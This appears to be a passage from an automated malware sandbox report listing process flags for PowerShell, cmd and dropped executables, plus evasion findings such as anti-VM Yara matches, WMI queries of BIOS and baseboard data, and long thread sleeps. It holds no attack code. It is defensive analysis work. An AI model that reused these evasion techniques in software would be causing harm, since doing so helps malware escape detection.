          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 0000001F.00000002.2281214797.0000000002131000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.2214696760.0000000002B4B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.2383386591.0000000002191000.00000004.00000001.sdmp, type: MEMORY
          Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_BaseBoard
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_BIOS
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FF00280EFC sldt word ptr [eax]
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\sp.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\sp.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\sp.exeWindow / User API: threadDelayed 3171
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeWindow / User API: threadDelayed 9387
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2932Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2396Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2964Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3036Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2364Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2112Thread sleep time: -31500s >= -30000s
          Source: C:\Users\user\AppData\Roaming\sp.exe TID: 1108Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2312Thread sleep count: 43 > 30
          Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2312Thread sleep time: -430000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\sp.exe TID: 1072Thread sleep count: 3171 > 30
          Source: C:\Users\user\AppData\Roaming\sp.exe TID: 1072Thread sleep time: -31710s >= -30000s
          Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2900Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2860Thread sleep time: -6456360425798339s >= -30000s
          Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2948Thread sleep count: 254 > 30
          Source: C:\Users\user\AppData\Roaming\sp.exe TID: 1872Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 1316Thread sleep time: -31500s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 3068Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 820Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 3028Thread sleep time: -420000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 2172Thread sleep time: -11990383647911201s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 2172Thread sleep time: -180000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 912Thread sleep count: 9387 > 30
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 912Thread sleep count: 249 > 30
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe TID: 648Thread sleep time: -31500s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe TID: 2040Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe TID: 2128Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\sp.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\sp.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\sp.exeThread sleep count: Count: 3171 delay: -10
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError,
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_005C7F30 FindFirstFileW,GetLastError,
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_0044A238 __EH_prolog,new,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetProductInfo,
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
